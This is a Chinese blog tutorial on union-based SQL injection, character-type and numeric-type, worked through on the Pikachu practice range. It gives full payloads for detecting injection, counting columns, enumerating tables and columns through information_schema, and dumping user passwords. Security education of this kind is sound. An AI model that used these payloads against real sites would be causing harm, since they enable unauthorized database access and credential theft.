union注入之字符型注入和数值型注入

最新推荐文章于 2023-09-13 20:18:14 发布
最新推荐文章于 2023-09-13 20:18:14 发布
阅读量680 收藏 1
点赞数 1
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ws1813004226/article/details/116599138
版权

一、什么是SQL注入?

SQL注入就是web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带进数据库查询,攻击者可以通过构造不同的SQL语句实现对数据库的任意操作。

二、union注入

当页面不屏蔽返回的报错信息且没有屏蔽“union”关键字的时候,我们就可以使用union注入。以下我们通过字符型和数值型两种类型对union注入进行理解。

<1>字符型注入

判断方法
当输入的参数类型为字符型时,数据库执行的查询语句为:select * from users where id=‘x’,我们可以使用’1’=‘1和’1’=‘2判断是否存在SQL注入。
(1)URL 地址中输入 http://xxx/abc.php?id= x’ and ‘1’=‘1 页面运行正常,继续进行下一步。
(2)URL 地址中继续输入 http://xxx/abc.php?id= x’ and ‘1’='2 页面运行错误,则说明此 Sql 注入为字符型注入。
原因如下
(1)当我们输入id= and ‘1’='1时,数据库执行的查询语句为:

select* from <表名> where id= 'x' and '1'='1'

语法正确,且逻辑没有问题,所以返回结果正确。
(2)当我们输入 x’ and ‘1’='2时,数据库执行的查询语句为:

select* from <表名> where id= 'x' and '1'='2'

语法正确,但逻辑有问题,所以返回结果错误。

实例

这里我们使用pikachu靶场进行测试,我们先输入kobe’ and ‘1’=‘1,输出正常,这里也可使用(ww’ or ‘1’=‘1)。
在这里插入图片描述
然后我们输入kobe’ and ‘1’='2,输出错误。
在这里插入图片描述说明存在SQL注入,接下来获取数据表的字段数,输入:

kobe' order by 3#

在这里插入图片描述
报错,尝试kobe’ order by 2#,返回正常,说明该表字段数为2。接下来我们需要获取数据库名。尝试在2的位置输入:

' union select 1,database()#

在这里插入图片描述
获取到数据库名为:pikachu,接下来我们需要获取表名。

' union select 1,table_name from information_schema.tables where table_schema= 'pikachu'#

在这里插入图片描述
再接下来就是获取字段名了。

' union select 1,column_name  from information_schema.columns where table_schema= 'pikachu'and table_name='users'#

在这里插入图片描述
最后就是获取字段内容了。

' union select id,password from pikachu.users#

在这里插入图片描述

数值型注入

判断方法
当输入的参数x为整型时,数据库执行的查询语句为:select * from <表名> where id = x,这时候可以使用and 1=1 和 and 1=2 来判断。
(1)url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。
(2)url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误,则说明此注入为数值型注入。
原因如下
(1)当输入 and 1=1时,数据库执行的SQL语句为:

select*  from <表名> where id = x and 1=1

没有语法错误且逻辑判断为正确,所以返回正常。
(2)当输入 and 1=2时,数据库执行的SQL语句为:

select * from <表名> where id = x and 1=2

没有语法错误但是逻辑判断为假,所以返回错误。

实例

首先我们需要判断是否存在注入,在这里由于没有不能进行输入,所以我们需要通过修改包的方式进行判断。先随便选择一个id,点击提交进行抓包。
在这里插入图片描述
我们先尝试and1=1,发现返回与id=1相同的结果。
在这里插入图片描述
我们再尝试添加and1=2,发现返回错误。由此我们断定此处存在SQL注入。
在这里插入图片描述
接下来同样的,我们先获取字段数。

1 order by 2

在这里为了屏蔽“id”为正常值时的返回结果,我们可以将id值修改为其他不存在的数值(也只能是数值),以下都将其修改为“-1”。接下来获取数据库名。

-1 union select 1,database()

在这里插入图片描述
接下来是表名。

-1 union select 1,table_name from information_schema.tables where table_schema= 'pikachu'

在这里插入图片描述

再是字段名。

-1 union select 1,column_name  from information_schema.columns where table_schema= 'pikachu'and table_name='users'

在这里插入图片描述

最后是字段内容。

-1 union select id,password from pikachu.users

在这里插入图片描述

树火
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql字符注入数字型注入unioni联合注入
2301_77451464的博客
01-28 325
当输入id=1和id=1 or 1=1时的界面不同的话,那么大概率就是发生了sql注入
最新Java面试宝典pdf版
08-31
给一个 Bean 的 message 属性, 字符串类, 注入值为 "Hello" 的 XML 配置文件该怎么写? 125 19、Jdo是什么? 125 20、什么是spring的IOC AOP 126 21、STRUTS的工作流程! 126 22、spring 与EJB的区别!! 126 八. ...
sql注入的分类:数字型字符
qq_45627785的博客
08-05 1402
sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。 一、万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理。万能密码是由于某些程序,通过采用判断sql语句查询结果的值是否大于0,来判断用户输入数据的正确性造成的。当查询之大于0时,代表用户存在,返回true,代表登录成功
sql-labs数字型字符注入
m0_63510587的博客
02-16 3722
访问SQLi-Labs网站 一、数字型注入 1、访问less-2 访问后根据提示先给定一个GET参数 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名和密码 2、寻找注入点、判断注入 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1’ >> 运行后报错 http://127.0.0.1/bc/sqli-labs/Less-2/?id=1 and 1=1 >>
sql注入字符数字型
qq_75005708的博客
04-08 2091
id=1%' and 1=1--+/#和?id=1%' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1' and 1=1--+/#和?id=1' and 1=2--+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为。
理论篇8:SQL注入(字符注入数字型注入)
aiojay的博客
05-02 2302
SQL注入(字符注入数字型注入),Mysql中 int(3) 类的含义,判断MYSQL注入闭合方式:
【SQL注入数字型注入 & 字符注入
07-12 2053
【SQL-数字&字符
sql注入如何区分字符还是数字型
最新发布
m0_65150886的博客
09-13 750
其实所有产生类都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类限制,而不同的数据库有不同的数据类,不管我们怎么分常用的数据类总是以数值字符来进行区分的。
pikachu靶场--SQL inject--数字型(post)/字符(get)/搜索/xx注入【4.1】~【4.4】
lmei1228的博客
06-10 657
当我们输入字符的时候,正常情况下,后台会给输入的字符+单引号,把他作为一个整个的字符串来处理,所以我们如果输入的是kobe or 1 = 1,传到后台的时候,or 1 = 1就不会起作用了,因此我们要构造闭合,输入kobe’ or 1 = 1#(#用--替换也可以,都是有着注释的意思,把后面的单引号注释掉),可以看到,它也能实现遍历。首先,打开我们的mysql数据库,use pikachu,然后对表“member”做查询,可以看到当参数为“1”和“1 or 1=1”时,所查询到的结果时大不相同的。
如何判断是字符注入还是数字型注入
原味瓜子、的博客
09-28 8103
前言 通常sql 注入漏洞会被分为2种类 数值 字符 其实所有产生类都是数据库本身表产生的,在我们创建的时候会发现其后面总有个数据类限制,而不同的数据库有不同的数据类,不管我们怎么分常用的数据类总是以数值字符来进行区分的。 如何区分 1)数字型 当输入的参数x为整的时候,通常sql语句是这样的 select * from users where id =x 这种类可以使用经典的and 1=1 and 1=2来判断 url地址中输入www.xxxx.com/ccc.php?i
CTFHUB - SQL注入-整数字符注入
m0_64180167的博客
11-28 2074
对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。,在管理员不知情的情况下实现非法操作,以此来实现欺骗。执行非授权的任意查询,从而进一步得到相应的数据信息。在学习SQL注入时要了解一些MYSQL语法。
sql数字型 字符注入的区别
weixin_43749051的博客
03-02 2492
** 数字型判断 ** 当输入的参 x 为整时,通常 abc.php 中 Sql 语句类大致如下: select * from <表名> where id = x 这种类可以使用经典的 and 1=1 和 and 1=2 来判断: Url 地址中输入 www.xxx.com/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步。 Url 地址中继续输入 www.xxx.com/abc.php?id= x and 1=2 页面运行错误,则说明此 Sql 注入数字型
4-5-2 判断字符数字型注入
小约翰呼噜噜的博客
09-18 1231
4-5-2 判断字符数字型注入 以下以GET注入为例,即参数在URL里,若为POST等其他注入,只需把构造的语句换到其对应参数位置即可。 (如POST注入,就把构造的SQL语句放入其参数位置,即HTTP请求的包体里) 1. 判断的指导思路 加单引号或双引号,如:www.text.com/text.php?id=3’ 若加单引号不正常或报错,则考虑: 单引号字符注入 数字型注入 若加单引号正常,则考虑: 双引号字符注入 带括号的单/双引号字符注入 原句有过滤 以上均为预判,具体仍需要
sql注入数字型字符的原理 //(dvwa实战 sql injection low)
weixin_43749051的博客
03-04 1670
1、数字型注入 当输入的参数为整形时,如果存在注入漏洞,可以认为是数字型注入。 测试步骤: (1) 加单引号,URL:www.text.com/text.php?id=3’ 对应的sql:select * from table where id=3’ 这时sql语句出错,不符合sql语法,让数据库系统报错,如果没报错就说明 ‘ 被过滤了,这样不存在注入的可能。 (2) 加and 1=1 ,URL:www.text.com/text.php?id=3 and 1=1 对应的sql:select *
sql注入
weixin_54217950的博客
02-13 394
什么是sql注入? 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据中包含对某些数据库系 统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后 台数据库乃至整个应用系统的入侵。 sql注入原理? 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 sql注入的分类 按照注入点类分类 数字型(整注入 字符注入
sql 手工注入字符串类
05-25
手工 SQL 注入漏洞通常是通过在应用程序的输入框中注入恶意 SQL 代码来实现的。当用户在应用程序的输入框中输入字符串时,如果应用程序没有对用户输入进行充分的验证和过滤,攻击者就可以在输入框中注入恶意的 SQL 代码,从而导致应用程序执行恶意的 SQL 查询。 在字符串类的 SQL 注入攻击中,攻击者通常会在输入框中输入一些特殊字符,例如单引号、双引号、反斜线等等,以试图破坏 SQL 查询语句的结构。攻击者还可能尝试使用 UNION、SELECT、FROM 等关键字来构造恶意查询语句,或者使用注释符号(例如"--")来注释掉原始查询语句中的一部分。最终,攻击者的目标是获取应用程序中存储的敏感数据,例如用户密码、信用卡信息等等。 要防止字符串类的 SQL 注入攻击,应用程序可以采取以下措施: 1. 对用户输入进行充分的验证和过滤,确保用户输入的数据符合预期的格式和结构。 2. 使用预编译语句或参数化查询,以保证 SQL 查询语句的结构不会被破坏。 3. 不要将用户输入作为 SQL 查询语句的一部分拼接到一起,而是使用参数化查询或存储过程来执行 SQL 查询。 4. 在应用程序中启用严格的访问控制和权限管理,以确保只有经过授权的用户才能访问敏感数据。 5. 定期对应用程序进行安全审计和漏洞扫描,及时发现和修复潜在的安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值